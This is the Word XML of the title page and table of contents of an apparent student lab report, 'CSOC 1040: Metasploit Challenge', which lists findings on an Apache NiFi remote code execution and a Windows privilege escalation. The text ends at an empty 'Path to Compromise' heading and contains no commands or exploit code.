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C58D6" w14:textId="0338E62B" w:rsidR="006D0809" w:rsidRDefault="0180BCFD" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>CSOC 10</w:t>
      </w:r>
      <w:r w:rsidR="00E025D2">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0: </w:t>
      </w:r>
      <w:r w:rsidR="00C560EA">
        <w:t>Metasploit Challenge</w:t>
      </w:r>
      <w:r w:rsidR="00CE5256">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566182C0" w14:textId="6CC071B4" w:rsidR="00B0390B" w:rsidRPr="00B0390B" w:rsidRDefault="00C560EA" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>September</w:t>
      </w:r>
      <w:r w:rsidR="3EE847B1" w:rsidRPr="006D0809">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="002B529D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="3EE847B1" w:rsidRPr="006D0809">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51385712" w14:textId="77777777" w:rsidR="00B0390B" w:rsidRDefault="00B0390B" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5081F98D" w14:textId="234E5C11" w:rsidR="00B0390B" w:rsidRDefault="00B0390B" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared By: </w:t>
      </w:r>
      <w:r w:rsidR="002B529D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ashish Hedau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225623C7" w14:textId="77777777" w:rsidR="00163836" w:rsidRDefault="00163836" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48654649" w14:textId="77777777" w:rsidR="00B0390B" w:rsidRDefault="00B0390B" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="2037928703"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="1A357662" w14:textId="74E2D2C4" w:rsidR="00792B52" w:rsidRDefault="00792B52" w:rsidP="002B529D">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3CEFFC79" w14:textId="656C8C17" w:rsidR="003678CA" w:rsidRDefault="00792B52">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc146821156" w:history="1">
            <w:r w:rsidR="003678CA" w:rsidRPr="00FB3645">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Path to Compromise</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc146821156 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5DB58699" w14:textId="019AF8DA" w:rsidR="003678CA" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc146821157" w:history="1">
            <w:r w:rsidR="003678CA" w:rsidRPr="00FB3645">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Technical Findings</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc146821157 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17F970DA" w14:textId="512B2906" w:rsidR="003678CA" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc146821158" w:history="1">
            <w:r w:rsidR="003678CA" w:rsidRPr="00FB3645">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Unpatched Apache NiFi API running on http://192.168.203.225:8080 leading to Remote Code Execution</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc146821158 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="576B29CB" w14:textId="413BF08E" w:rsidR="003678CA" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc146821159" w:history="1">
            <w:r w:rsidR="003678CA" w:rsidRPr="00FB3645">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc146821159 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="452F3F57" w14:textId="58C9679A" w:rsidR="003678CA" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc146821160" w:history="1">
            <w:r w:rsidR="003678CA" w:rsidRPr="00FB3645">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc146821160 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="409DCA57" w14:textId="4EEE025C" w:rsidR="003678CA" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc146821161" w:history="1">
            <w:r w:rsidR="003678CA" w:rsidRPr="00FB3645">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc146821161 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00684E5D" w14:textId="41368DB9" w:rsidR="003678CA" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc146821162" w:history="1">
            <w:r w:rsidR="003678CA" w:rsidRPr="00FB3645">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Technical Findings</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc146821162 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C9308B2" w14:textId="67D08269" w:rsidR="003678CA" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc146821163" w:history="1">
            <w:r w:rsidR="003678CA" w:rsidRPr="00FB3645">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Privilege Escalation vulnerability: From user ‘itwk03\alex’ to NT AUTHORITY\SYSTEM</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc146821163 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FC1765F" w14:textId="34749554" w:rsidR="003678CA" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc146821164" w:history="1">
            <w:r w:rsidR="003678CA" w:rsidRPr="00FB3645">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc146821164 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BE6FD57" w14:textId="59630D2B" w:rsidR="003678CA" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc146821165" w:history="1">
            <w:r w:rsidR="003678CA" w:rsidRPr="00FB3645">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc146821165 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1791E2ED" w14:textId="357702B5" w:rsidR="003678CA" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc146821166" w:history="1">
            <w:r w:rsidR="003678CA" w:rsidRPr="00FB3645">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc146821166 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="003678CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="100B55B0" w14:textId="52BB5C5D" w:rsidR="00792B52" w:rsidRDefault="00792B52" w:rsidP="002B529D">
          <w:pPr>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="712E4D82" w14:textId="07C499F4" w:rsidR="00B0390B" w:rsidRDefault="00B0390B" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4398A1A2" w14:textId="32698CA3" w:rsidR="00930EBB" w:rsidRDefault="00930EBB" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0180BCFD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="159AA5D7" w14:textId="75E29F4B" w:rsidR="0180BCFD" w:rsidRDefault="00F94FC9" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc146821156"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Path to Compromise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3B9CE273" w14:textId="77777777" w:rsidR="00945A2F" w:rsidRDefault="00945A2F" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
